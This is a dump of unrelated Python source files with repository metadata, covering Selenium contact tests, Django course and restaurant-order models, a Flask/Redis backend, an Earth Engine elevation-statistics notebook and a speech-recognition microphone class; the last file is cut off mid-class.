self.change_field_value("homepage", contact.homepage)
self.change_field_value("byear", contact.byear)
self.change_field_value("ayear", contact.ayear)
self.change_field_value("address2", contact.address2)
self.change_field_value("phone2", contact.phone2)
self.change_field_value("notes", contact.notes)
def delete_contact_by_index(self, index):
wd = self.app.wd
self.select_contact_by_index(index)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def delete_contact_by_id(self, id):
wd = self.app.wd
self.select_contact_by_id(id)
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.return_to_home_page()
self.contact_cache = None
def delete_first_contact(self):
self.delete_contact_by_index(0)
def modify_contact_by_index(self, index, new_contact_data):
wd = self.app.wd
all_rows = wd.find_elements_by_name("entry")
row = all_rows[index]
cells = row.find_elements_by_tag_name("td")
cells[7].find_element_by_tag_name("a").click()
self.fill_contact_form(new_contact_data)
#submit modification
wd.find_element_by_name("update").click()
wd.find_element_by_link_text("home").click()
self.contact_cache = None
def add_contact_to_group(self, id):
wd = self.app.wd
self.select_contact_by_id(id)
wd.find_element_by_xpath("//div[@class='right']/select//option[2]").is_selected()
wd.find_element_by_xpath("//div[@class='right']/select//option[2]").click()
wd.find_element_by_name("add").click()
self.return_to_home_page()
def delete_contact_from_group(self, id):
wd = self.app.wd
wd.find_element_by_xpath("//form[@id='right']/select//option[4]").is_selected()
wd.find_element_by_xpath("//form[@id='right']/select//option[4]").click()
self.select_contact_by_id(id)
wd.find_element_by_name("remove").click()
self.return_to_home_page()
    def modify_first_contact(self, new_contact_data):
        self.modify_contact_by_index(0, new_contact_data)
def return_to_home_page(self):
wd = self.app.wd
wd.find_element_by_link_text("home").click()
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def select_first_item(self):
wd = self.app.wd
wd.find_element_by_name("selected[]").click()
def select_contact_by_index(self, index):
wd = self.app.wd
wd.find_elements_by_name("selected[]")[index].click()
def select_contact_by_id(self, id):
wd = self.app.wd
wd.find_element_by_css_selector("input[value='%s']" % id).click()
def count(self):
wd = self.app.wd
self.return_to_home_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
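    # The row cache is reset to None by any operation that changes the contact list, forcing a reload.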
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.return_to_home_page()
self.contact_cache = []
for element in wd.find_elements_by_name("entry"):
cells = element.find_elements_by_tag_name("td")
firstname = cells[2].text
lastname = cells[1].text
# id = element.find_element_by_name("selected[]").get_attribute("value")
id = cells[0].find_element_by_tag_name("input").get_attribute("value")
all_phones = cells[5].text
all_emails = cells[4].text
address = cells[3].text
self.contact_cache.append(Contact(firstname=firstname, lastname=lastname, id=id,
all_phones_from_home_page=all_phones, all_emails_from_home_page=all_emails, address=address))
return list(self.contact_cache)
def open_contact_to_edit_by_index(self, index):
wd = self.app.wd
self.return_to_home_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[7]
cell.find_element_by_tag_name("a").click()
def open_contact_view_by_index(self, index):
wd = self.app.wd
self.return_to_home_page()
row = wd.find_elements_by_name("entry")[index]
cell = row.find_elements_by_tag_name("td")[6]
cell.find_element_by_tag_name("a").click()
def get_contact_info_from_edit_page(self, index):
wd = self.app.wd
self.open_contact_to_edit_by_index(index)
firstname = wd.find_element_by_name("firstname").get_attribute("value")
lastname = wd.find_element_by_name("lastname").get_attribute("value")
id = wd.find_element_by_name("id").get_attribute("value")
home = wd.find_element_by_name("home").get_attribute("value")
mobile = wd.find_element_by_name("mobile").get_attribute("value")
work = wd.find_element_by_name("work").get_attribute("value")
phone2 = wd.find_element_by_name("phone2").get_attribute("value")
email = wd.find_element_by_name("email").get_attribute("value")
email2 = wd.find_element_by_name("email2").get_attribute("value")
email3 = wd.find_element_by_name("email3").get_attribute("value")
address = wd.find_element_by_name("address").get_attribute("value")
return Contact(firstname=firstname, lastname=lastname, id=id,
home=home, mobile=mobile, work=work, phone2=phone2, email=email, email2=email2, email3=email3, address=address)
def get_contact_from_view_page(self, index):
wd = self.app.wd
self.open_contact_view_by_index(index)
text = wd.find_element_by_id("content").text
home = re.search("H: (.*)", text).group(1)
mobile = re.search("M: (.*)", text).group(1)
work = re.search("W: (.*)", text).group(1)
phone2 = re.search("P: (.*)", text).group(1)
return Contact(home=home, mobile=mobile, work=work, phone2=phone2)
|
[
"juliette_n@mail.ru"
] |
juliette_n@mail.ru
|
2cc0955608d1892183da69044d8e2b0b20f5dac9
|
80cd5713fb2d844ee235609911643c43e306da75
|
/resize_category.py
|
eafd2fab720b416d9bf6282e0c412b920d7bdef2
|
[
"Apache-2.0"
] |
permissive
|
aurora-feng/aurora-feng.github.io
|
becd96d8140488d3b75f09780b5d59f028903db4
|
6d65564acabedade72fdda56dbada9c13a3ec99b
|
refs/heads/master
| 2020-06-02T22:02:09.619722
| 2019-06-23T14:26:15
| 2019-06-23T14:26:15
| 191,321,370
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
import os
import shutil
from PIL import Image
from resizeimage import resizeimage
thumb_size = (400, 289)
reg_size = (600, 450)  # unused: full-size images are copied without resizing
_origin_path = '/Users/zhibin.jiang/Downloads/temp/{cate}/'
new_path = '/Users/zhibin.jiang/Learning/aurora_profolio/img/{cate}/'
def main():
for cate in ['cate_flower', 'cate_life', 'cate_human', 'cate_view', 'cate_painting']:
origin_path = _origin_path.format(cate=cate)
if not os.path.exists(new_path.format(cate=cate)):
os.mkdir(new_path.format(cate=cate))
for image_name in os.listdir(origin_path):
            if not image_name.endswith('g'):  # crude filter: keeps .jpg/.jpeg/.png files
                continue
image_path = origin_path + image_name
print("Processing: ", image_path)
with open(image_path, 'rb') as f_rb:
with Image.open(f_rb) as image:
prefix, postfix = image_name.split('.')[0].strip('_'), image_name.split('.')[-1]
reg = new_path.format(cate=cate) + '{}.{}'.format(prefix, postfix)
shutil.copy(image_path, reg)
thum = new_path.format(cate=cate) + '{}-thumbnail.{}'.format(prefix, postfix)
                    thumb = resizeimage.resize_cover(image, thumb_size)
thumb.save(thum, image.format)
if __name__ == '__main__':
main()
|
[
"zhibin.jiang@ihandysoft.com"
] |
zhibin.jiang@ihandysoft.com
|
9ac4fffb2f1957b093e87dc961375512e49b038c
|
63821348be843b185ce6887d0f3027686f157164
|
/simplemooc/simplemooc/courses/models.py
|
ef5748d97046fe21cc5a8a1eb470f7ad65860861
|
[] |
no_license
|
sadijrp/simplemooc-course
|
c79c295bbeb0b74b7ad622b5765fefd75274d45b
|
df15539ded0349e0dd8ce17744a03edb99a83ea6
|
refs/heads/master
| 2020-04-16T20:12:11.935589
| 2019-08-06T19:28:10
| 2019-08-06T19:28:10
| 165,890,333
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,208
|
py
|
from django.db import models
from django.urls import reverse
from django.conf import settings
from django.utils import timezone
from simplemooc.core.mail import send_mail_template
class CourseManager(models.Manager):
def search(self, query):
return self.get_queryset().filter(
models.Q(name__icontains=query) |
models.Q(description__icontains=query)
)
class Course(models.Model):
name = models.CharField('Nome', max_length=100)
slug = models.SlugField('Atalho')
description = models.TextField('Descrição', blank=True)
about = models.TextField('Sobre o Curso', blank=True)
start_date = models.DateField(
'Data de ínicio', null=True, blank=True
)
image = models.ImageField(
upload_to='courses/images',
verbose_name='Imagem',
null=True,
blank=True
)
created_at = models.DateTimeField(
'Criado em', auto_now_add=True
)
updated_at = models.DateTimeField(
'Atualizado em', auto_now=True
)
objects = CourseManager()
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('courses:details', args=[self.slug])
def released_lessons(self):
today = timezone.now().date()
return self.lessons.filter(release_date__lte=today)
class Meta:
verbose_name = "Curso"
verbose_name_plural = "Cursos"
ordering = ['name']
class Enrollment(models.Model):
STATUS_CHOICES = (
(0, 'Pendente'),
(1, 'Aprovado'),
(2, 'Cancelado')
)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name="Usuário",
related_name="userenrollments",
on_delete=models.PROTECT
)
course = models.ForeignKey(
Course,
verbose_name="Curso",
related_name="courseenrollments",
on_delete=models.PROTECT
)
status = models.IntegerField(
verbose_name="Situação",
choices=STATUS_CHOICES,
default=0,
blank=True
)
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True
)
def active(self):
self.status = 1
self.save()
def is_approved(self):
return self.status == 1
class Meta:
verbose_name = "Inscrição"
verbose_name_plural = "Inscrições"
unique_together = (('user', 'course'),)
class Announcement(models.Model):
course = models.ForeignKey(
Course,
verbose_name='Curso',
on_delete=models.CASCADE,
related_name='announcements')
title = models.CharField('Título', max_length=100)
content = models.TextField('Conteúdo')
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True
)
def __str__(self):
return self.title
class Meta:
verbose_name = 'Anúncio'
verbose_name_plural = 'Anúncios'
ordering = ['-created_at']
class Comment(models.Model):
announcement = models.ForeignKey(
Announcement,
verbose_name='Anúncio',
related_name='comments',
on_delete=models.CASCADE)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
verbose_name='Usuário',
on_delete=models.CASCADE)
comment = models.TextField('Comentário')
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True
)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True
)
class Meta:
verbose_name = 'Comentário'
verbose_name_plural = 'Comentários'
ordering = ['created_at']
class Lesson(models.Model):
name = models.CharField('Nome', max_length=100)
description = models.TextField('Descrição', blank=True)
number = models.IntegerField('Número (ordem)', blank=True, default=1)
release_date = models.DateField('Data de Liberação', blank=True, null=True)
created_at = models.DateTimeField(
verbose_name='Criado em',
auto_now_add=True)
updated_at = models.DateTimeField(
verbose_name='Atualizado em',
auto_now=True)
course = models.ForeignKey(
Course,
verbose_name='Curso',
related_name='lessons',
on_delete=models.CASCADE)
def __str__(self):
return self.name
def is_available(self):
if self.release_date:
today = timezone.now().date()
return self.release_date <= today  # available once the release date has passed, matching released_lessons()
class Meta:
verbose_name = 'Aula'
verbose_name_plural = 'Aulas'
ordering = ['number']
class Material(models.Model):
name = models.CharField('Nome', max_length=100)
embedded = models.TextField('Video embedded', blank=True)
file = models.FileField(
upload_to='lessons/materials',
blank=True,
null=True)
lesson = models.ForeignKey(
Lesson,
verbose_name='Aula',
related_name='materials',
on_delete=models.CASCADE)
def is_embedded(self):
return bool(self.embedded)
def __str__(self):
return self.name
class Meta:
verbose_name = 'Material'
verbose_name_plural = 'Materiais'
def post_save_announcement(instance, created, **kwargs):
if created:
announcement = instance
subject = announcement.title
context = {
'announcement': announcement
}
template_name = 'courses/announcement_mail.html'
enrollments = Enrollment.objects.filter(
course=announcement.course,
status=1
)
for enrollment in enrollments:
recipient_list = [enrollment.user.email]
send_mail_template(subject, template_name, context, recipient_list)
models.signals.post_save.connect(
post_save_announcement,
sender=Announcement,
dispatch_uid='post_save_announcement')
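# Hedged usage sketch (illustration only, assuming a configured Django project):
#
#   Course.objects.search('python')
#
# matches courses whose name OR description contains 'python' case-insensitively,
# via the Q objects combined with | in CourseManager.search().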
|
[
"sadijrp@gmail.com"
] |
sadijrp@gmail.com
|
70b26f8c54d7d8eb40302ee17781e84cf5a56c14
|
3eed35781bc9f63c33586f8f2abdcfde8e7bd9bd
|
/core/config.py
|
a611537caf766270a7a9177c53ac7ff1fc7ec356
|
[] |
no_license
|
peilion/OP-backend
|
6e192f2592c0ae526f69f279bd0ba3023af0e593
|
13f7499d8727dcf5c866870450b29c829b32b4e6
|
refs/heads/master
| 2022-12-13T11:41:33.575868
| 2020-08-24T02:00:28
| 2020-08-24T02:00:28
| 207,509,587
| 14
| 0
| null | 2022-12-08T06:54:48
| 2019-09-10T08:49:47
|
Python
|
UTF-8
|
Python
| false
| false
| 673
|
py
|
import os
API_V1_STR = "/api/v1"
SECRET_KEY = os.urandom(32)  # NOTE: regenerated on every process start, so previously issued tokens stop validating after a restart
DATABASE_CONNECTION_URL = os.getenv("DATABASE_CONNECTION_URL")
DATABASE_NAME = os.getenv("DATABASE_NAME")
ACCESS_TOKEN_EXPIRE_MINUTES = 60 * 24 * 8 # 60 minutes * 24 hours * 8 days = 8 days
SERVER_NAME = os.getenv("SERVER_NAME")
SERVER_HOST = os.getenv("SERVER_HOST")
BACKEND_CORS_ORIGINS = "http://localhost:9527,http://123.56.7.137" # a string of origins separated by commas, e.g: "http://localhost, http://localhost:4200, http://localhost:3000, http://localhost:8080, http://local.dockertoolbox.tiangolo.com"
PROJECT_NAME = "Oil Pump Data Api"
TIME_DOMAIN_SUB_SAMPLED_RATIO = 4
TIME_DOMAIN_DECIMAL = 3
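# Hedged sketch (the name below is an assumption, not used elsewhere in this module):
# consumers of BACKEND_CORS_ORIGINS typically split the comma-separated string into a list.
CORS_ORIGIN_LIST = [origin.strip() for origin in BACKEND_CORS_ORIGINS.split(",")]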
|
[
"peilun.fu117@gmail.com"
] |
peilun.fu117@gmail.com
|
6eb6b15fb8fac618ec7f278c5b9d56ac454ae588
|
da29482e5394e2e5398351be4cee818d73b5b163
|
/backend/backend.py
|
7675078cda620a1e88965cb9cc23eacc002edfb9
|
[] |
no_license
|
Ishikawa7/kubernetes-simple-flask-app
|
134ecaedf82941e4b9a137711d15f5eacfdbe518
|
33cfbcbbdc5085603d2544da913be5e84d234437
|
refs/heads/master
| 2022-08-26T05:17:50.409559
| 2022-08-10T08:14:14
| 2022-08-10T08:14:14
| 217,856,967
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 759
|
py
|
from flask import Flask, request
import redis
app = Flask(__name__)
# TODO Set the redis host
r = redis.Redis(host="redis-cluster-ip-service")
def count_primes(num = 100000):
if num < 2:
return 0
primes = [2]
for n in range(2, num + 1):
for p in primes:
if n % p == 0:
break
else:
primes.append(n)
return str(len(primes))
@app.route("/")
def hello():
return "Backend running"
@app.route('/bep1')
def cpuintensive():
return count_primes()
@app.route('/bep2', methods=['POST'])
def redisCall():
r.set("bodyReceived", str(request.data))  # redis-py exposes set(), not Set()
return "Successful!"
if __name__ == "__main__":
app.run(debug=True,host='0.0.0.0', port=5000)
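# Hedged usage sketch (illustration only): exercising the endpoints with Flask's test
# client; "/" and "/bep1" work standalone, while "/bep2" needs a reachable Redis host.
#
#   client = app.test_client()
#   client.get('/bep1')                     # CPU-intensive prime count
#   client.post('/bep2', data=b'{"k": 1}')  # stores the raw request body in Redis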
|
[
"davidegrimaldi92@gmail.com"
] |
davidegrimaldi92@gmail.com
|
401a554684fd8f2a37ab1c1f51825125ca46d77c
|
e7de9caf500cb10b726481161f86fb012477b66f
|
/contacto/migrations/0002_alter_contacto_email.py
|
63a518a0b0b2fc12015489dfe152222dc5265369
|
[] |
no_license
|
jdtorres1997/testUseIt
|
a0b7a95e13a64e1bfbc4c62bec048e2be038eebf
|
7646125aa50c3f2952fbdcb7ad5251d6684dbf58
|
refs/heads/main
| 2023-08-14T05:59:36.228937
| 2021-10-12T03:20:10
| 2021-10-12T03:20:10
| 415,361,118
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 415
|
py
|
# Generated by Django 3.2.8 on 2021-10-09 04:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contacto', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='contacto',
name='email',
field=models.EmailField(max_length=254, verbose_name='Correo electrónico'),
),
]
|
[
"juan.torres.canon@correounivalle.edu.co"
] |
juan.torres.canon@correounivalle.edu.co
|
de43a7611f08d4845ec9c811ad030b61c45a7bd1
|
07537f48d33b68e7e4dc2684802c203ccfff9ae1
|
/apps/trader/migrations/0001_initial.py
|
20655c884cdab95495bdfbddde43f523b499a497
|
[
"MIT"
] |
permissive
|
Cabelin-Software-Solutions/e-book-trading-club
|
8108d2974bb69bbd7d3ef64d8646d805a11f4782
|
61750c8e01b2a0f2bb0eca0318c36f4bcc5cf604
|
refs/heads/master
| 2021-01-21T06:05:58.493129
| 2017-08-31T21:13:11
| 2017-08-31T21:13:11
| 101,936,129
| 0
| 0
| null | 2017-08-31T21:13:12
| 2017-08-30T22:54:59
|
Python
|
UTF-8
|
Python
| false
| false
| 887
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-28 05:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('last_name', models.CharField(max_length=255)),
('email', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
|
[
"artemiocabelin@gmail.com"
] |
artemiocabelin@gmail.com
|
f8adcc98d428525a52292932206cab9b028763fb
|
c9eb50509cec04137bcd4622039678243c285830
|
/arnold/sensors/microphone.py
|
63ccc7590de2f43ea68c9842278a31a36a8eb309
|
[
"BSD-3-Clause"
] |
permissive
|
hacklabza/arnold
|
63ef9520cd40128330adc987130de9364484cd44
|
d51f6b751ce6530650555cd33bf707f00b60af59
|
refs/heads/develop
| 2023-07-29T13:48:37.442896
| 2021-10-28T06:00:50
| 2021-10-28T06:00:50
| 149,396,000
| 2
| 0
|
BSD-3-Clause
| 2023-07-18T04:04:41
| 2018-09-19T05:18:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,764
|
py
|
import logging
import os
from typing import Optional
import speech_recognition
from arnold import config
_logger = logging.getLogger(__name__)
class Microphone(object):
"""A sensor class which initialises the microphone component and add speech
recognition and command parsing to Arnold.
Args:
card_number (int, optional): The microphone device card number.
device_index (int, optional): The microphone device index.
sample_rate (int, optional): The microphone sample rate.
phrase_time_limit (int, optional): How long to listen for a phrase.
energy_threshold (int, optional): The microphone's energy threshold.
google_api_key_path (str, optional): The file path to the json api key.
"""
def __init__(
self,
card_number: Optional[int] = None,
device_index: Optional[int] = None,
sample_rate: Optional[int] = None,
phrase_time_limit: Optional[int] = None,
energy_threshold: Optional[int] = None,
google_api_key_path: Optional[str] = None
) -> None:
self.config = config.SENSOR['microphone']
# USB microphone adapter config
self.card_number = self.config['card_number'] if card_number is None else card_number
self.device_index = self.config['device_index'] if device_index is None else device_index
self.sample_rate = sample_rate or self.config['sample_rate']
# Setup logging
self._logger = _logger
# Speech recognition
self.phrase_time_limit = phrase_time_limit or self.config['phrase_time_limit']
self.speech_recogniser = speech_recognition.Recognizer()
self.speech_recogniser.energy_threshold = (
energy_threshold or self.config['energy_threshold']
)
# Google Cloud API integration
try:
self.google_api_key_path = (
google_api_key_path or config.INTEGRATION['google_cloud']['key_path']
)
except KeyError:
self.google_api_key_path = None  # recognise_command() checks this attribute when no key is configured
def listen(self) -> speech_recognition.AudioData:
"""Records the voice command from the microphone and returns the audio
bite.
Returns:
AudioData: an audio data object of the voice command recorded.
"""
with speech_recognition.Microphone(sample_rate=self.sample_rate) as source:
self.speech_recogniser.adjust_for_ambient_noise(source)
self._logger.info('Ready to receive voice commands.')
voice_command = self.speech_recogniser.listen(
source, phrase_time_limit=self.phrase_time_limit
)
return voice_command
def recognise_command(self, voice_command: speech_recognition.AudioData) -> Optional[str]:
"""Takes a voice command audio bite as input and calls the google voice
to text service to determine the text command which can be parsed.
Args:
voice_command (speech_recognition.AudioData): Recorded voice command
Returns:
Optional[str]: the text command as processed by the Google speech
recognition engine.
"""
if self.google_api_key_path:
google_cloud_credentials = ''
with open(os.path.join(config.ROOT_DIR, self.google_api_key_path), 'r') as file:
google_cloud_credentials = file.read()
return self.speech_recogniser.recognize_google_cloud(
voice_command,
credentials_json=google_cloud_credentials,
language='en-ZA'
)
else:
self._logger.error(
'Can\'t proceed. Google Cloud API key not found.'
)
return ''
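# Hedged usage sketch (illustration only; needs a microphone and, for recognition,
# the Google Cloud key configured via config.INTEGRATION as above):
#
#   mic = Microphone()
#   audio = mic.listen()                  # blocks until a phrase is captured
#   text = mic.recognise_command(audio)   # '' when no API key is configured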
|
[
"jpbydendyk@gmail.com"
] |
jpbydendyk@gmail.com
|
8da6237185e6503c1a44b84a23ce071fc75a6451
|
f9281982adad378b6c87b4d274aed131e427b1ac
|
/product.py
|
f4f0a3950b9b807af7a9d5f78c7520e4169f8116
|
[] |
no_license
|
AdamDonna/dius-code-challenge
|
fbc6fc569a8758b3db3da45d2a8c60852ec71d47
|
bd0487dc3e36c23f64551f7793779d64ae4ca618
|
refs/heads/master
| 2022-12-13T10:39:05.451902
| 2020-09-05T05:34:15
| 2020-09-05T05:34:15
| 293,010,172
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 882
|
py
|
class BaseProduct:
sku = None
price = None
name = None
__subclass_map__ = {}
@classmethod
def register_product(cls):
cls.__subclass_map__[cls.sku] = cls
def __init_subclass__(cls, **kwargs):
"""Register the class in the list of products we have"""
super().__init_subclass__(**kwargs)
cls.register_product()
@classmethod
def get_catalog_product(cls, sku):
"""Get the product in the catalog"""
return cls.__subclass_map__.get(sku)
class SuperIpad(BaseProduct):
sku = 'ipd'
price = 549.99
name = 'Super iPad'
class MacbookPro(BaseProduct):
sku = 'mbp'
price = 1399.99
name = 'MacBook Pro'
class AppleTV(BaseProduct):
sku = 'atv'
price = 109.50
name = 'Apple TV'
class VGAadapter(BaseProduct):
sku = 'vga'
price = 30.00
name = 'VGA adapter'
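# Hedged usage sketch (added for illustration): every subclass defined above registered
# itself via __init_subclass__, so products can be looked up by SKU without a manual map.
if __name__ == '__main__':
    ipad = BaseProduct.get_catalog_product('ipd')   # returns the SuperIpad class
    print(ipad.name, ipad.price)                    # Super iPad 549.99
    print(BaseProduct.get_catalog_product('xyz'))   # None for unknown SKUs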
|
[
"adamdonaghy1994@gmail.com"
] |
adamdonaghy1994@gmail.com
|
2dbfcec6679b3a1d5e552490860e8eae8fee6a3c
|
8ca045c0b94729222e8f3ffe184c0d4f564418c4
|
/Image/band_stats.py
|
5efa9b90869435a090e34c208388ef65ac1eac1a
|
[
"MIT"
] |
permissive
|
levi-manley/earthengine-py-notebooks
|
bc77632ca22ca85c0092c18f1eb8321abfbe874a
|
f5a888ddb6834f164e7399b20c683fb9cf604465
|
refs/heads/master
| 2021-01-02T12:17:27.974005
| 2020-02-09T02:59:20
| 2020-02-09T02:59:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,615
|
py
|
'''
<table class="ee-notebook-buttons" align="left">
<td><a target="_blank" href="https://github.com/giswqs/earthengine-py-notebooks/tree/master/Image/band_stats.ipynb"><img width=32px src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" /> View source on GitHub</a></td>
<td><a target="_blank" href="https://nbviewer.jupyter.org/github/giswqs/earthengine-py-notebooks/blob/master/Image/band_stats.ipynb"><img width=26px src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/38/Jupyter_logo.svg/883px-Jupyter_logo.svg.png" />Notebook Viewer</a></td>
<td><a target="_blank" href="https://mybinder.org/v2/gh/giswqs/earthengine-py-notebooks/master?filepath=Image/band_stats.ipynb"><img width=58px src="https://mybinder.org/static/images/logo_social.png" />Run in binder</a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/giswqs/earthengine-py-notebooks/blob/master/Image/band_stats.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" /> Run in Google Colab</a></td>
</table>
'''
# %%
'''
## Install Earth Engine API
Install the [Earth Engine Python API](https://developers.google.com/earth-engine/python_install) and [geehydro](https://github.com/giswqs/geehydro). The **geehydro** Python package builds on the [folium](https://github.com/python-visualization/folium) package and implements several methods for displaying Earth Engine data layers, such as `Map.addLayer()`, `Map.setCenter()`, `Map.centerObject()`, and `Map.setOptions()`.
The magic command `%%capture` can be used to hide output from a specific cell. Uncomment these lines if you are running this notebook for the first time.
'''
# %%
# %%capture
# !pip install earthengine-api
# !pip install geehydro
# %%
'''
Import libraries
'''
# %%
import ee
import folium
import geehydro
# %%
'''
Authenticate and initialize Earth Engine API. You only need to authenticate the Earth Engine API once. Uncomment the line `ee.Authenticate()`
if you are running this notebook for the first time or if you are getting an authentication error.
'''
# %%
# ee.Authenticate()
ee.Initialize()
# %%
'''
## Create an interactive map
This step creates an interactive map using [folium](https://github.com/python-visualization/folium). The default basemap is the OpenStreetMap. Additional basemaps can be added using the `Map.setOptions()` function.
The optional basemaps can be `ROADMAP`, `SATELLITE`, `HYBRID`, `TERRAIN`, or `ESRI`.
'''
# %%
Map = folium.Map(location=[40, -100], zoom_start=4)
Map.setOptions('HYBRID')
# %%
'''
## Add Earth Engine Python script
'''
# %%
# get highest value
def maxValue(img, scale=30):
max_value = img.reduceRegion(**{
'reducer': ee.Reducer.max(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return max_value
# get lowest value
def minValue(img, scale=30):
min_value = img.reduceRegion(**{
'reducer': ee.Reducer.min(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return min_value
# get mean value
def meanValue(img, scale=30):
mean_value = img.reduceRegion(**{
'reducer': ee.Reducer.mean(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return mean_value
# get standard deviation
def stdValue(img, scale=30):
std_value = img.reduceRegion(**{
'reducer': ee.Reducer.stdDev(),
'geometry': img.geometry(),
'scale': scale,
'maxPixels': 1e9
})
return std_value
dataset = ee.Image('USGS/NED')
dem = dataset.select('elevation')
# dem = ee.Image('srtm90_v4')
vis_params = {'min': 0, 'max': 3000}
Map.addLayer(dem, vis_params, 'NED', False)
roi = ee.Geometry.Polygon(
[[[-120.18204899532924, 38.53481618819663],
[-120.18204899532924, 36.54889033300136],
[-116.75431462032924, 36.54889033300136],
[-116.75431462032924, 38.53481618819663]]])
image = dem.clip(roi)
Map.centerObject(image, 9)
Map.addLayer(image, vis_params, 'DEM')
scale = image.projection().nominalScale()
print("Resolution: ", scale.getInfo())
scale = 30
print("Minimum value: ", minValue(image, scale).get('elevation').getInfo())
print("Maximum value: ", maxValue(image, scale).get('elevation').getInfo())
print("Average value: ", meanValue(image, scale).get('elevation').getInfo())
print("Standard deviation: ", stdValue(image, scale).get('elevation').getInfo())
# %%
'''
## Display Earth Engine data layers
'''
# %%
Map.setControlVisibility(layerControl=True, fullscreenControl=True, latLngPopup=True)
Map
|
[
"giswqs@gmail.com"
] |
giswqs@gmail.com
|
92942d00d79abf7e2bc0aae1efadd4b6ab06f8e4
|
ec876d7c77aecc45e4ba23463ead7d89a4ea44d7
|
/ordersystem/ordersystem/apps/orders/models.py
|
a4f812d87d9211caf31cdca0b4070536e81b9719
|
[] |
no_license
|
xuyunfeng12388/OrederSystem
|
c709da33379fccb471e8c9766ac01cc0122dfd26
|
b033383a1866b39e527f13b36aa027a413a47bdb
|
refs/heads/master
| 2022-12-15T04:50:29.657785
| 2020-03-20T07:07:09
| 2020-03-20T07:07:09
| 248,689,316
| 1
| 0
| null | 2022-11-22T05:24:47
| 2020-03-20T07:02:02
|
Python
|
UTF-8
|
Python
| false
| false
| 3,531
|
py
|
from django.db import models
from ordersystem.utlis.models import BaseModel
# Create your models here.
class DinnerTable(BaseModel):
"""餐桌"""
TABLE_STATUS_ENUM = {
"有人": 1,
"空闲": 2
}
TABLE_STATUS_CHOICES = (
(1, "有人"),
(2, "空闲")
)
tableName = models.CharField(max_length=25, verbose_name="餐桌名称")
tableKey = models.IntegerField(verbose_name='餐桌代号', default=None, unique=True)
status = models.SmallIntegerField(choices=TABLE_STATUS_CHOICES, default=2, verbose_name="餐桌状态")
class Meta:
db_table = 'tb_dinner_table'
verbose_name = '餐桌信息'
verbose_name_plural = verbose_name
def __str__(self):
return '%s' % self.tableName
class OrderInfo(BaseModel):
"""
订单信息
"""
PAY_METHODS_ENUM = {
"CASE": 1,
"ALIPAY": 2,
"WEICHAT": 3,
}
PAY_METHOD_CHOICES = (
(1, "现金"),
(2, "支付宝"),
(3, "微信")
)
ORDER_STATUS_ENUM = {
"EDIT": 1,
"PREPARE": 2,
"UNPAID": 3,
"FINISHED": 4,
"CANCELED": 5,
}
ORDER_STATUS_CHOICES = (
(1, "可编辑"),
(2, "正在备菜"),
(3, "待支付"),
(4, "已完成"),
(5, "取消"),
)
order_id = models.CharField(max_length=64, primary_key=True, verbose_name="订单号")
tableKey = models.ForeignKey(DinnerTable, on_delete=models.PROTECT, verbose_name="餐桌代号")
# address = models.ForeignKey(Address, on_delete=models.PROTECT, verbose_name="收获地址")
total_count = models.IntegerField(default=1, verbose_name="商品总数")
total_amount = models.DecimalField(max_digits=10, decimal_places=2, verbose_name="商品总金额")
# freight = models.DecimalField(max_digits=10, decimal_places=2, verbose_name="运费")
pay_method = models.SmallIntegerField(choices=PAY_METHOD_CHOICES, default=1, verbose_name="支付方式")
status = models.SmallIntegerField(choices=ORDER_STATUS_CHOICES, default=1, verbose_name="订单状态")
comment = models.CharField(default=None, verbose_name="订单备注", max_length=1024)
class Meta:
db_table = "tb_order_info"
verbose_name = '订单基本信息'
verbose_name_plural = verbose_name
def __str__(self):
return '%s: %s' % (self.order_id, self.tableKey)
class OrderGoods(BaseModel):
"""
订单商品
"""
SCORE_CHOICES = (
(0, '0分'),
(1, '20分'),
(2, '40分'),
(3, '60分'),
(4, '80分'),
(5, '100分'),
)
order = models.ForeignKey(OrderInfo, related_name='order_goods', on_delete=models.CASCADE, verbose_name="订单")
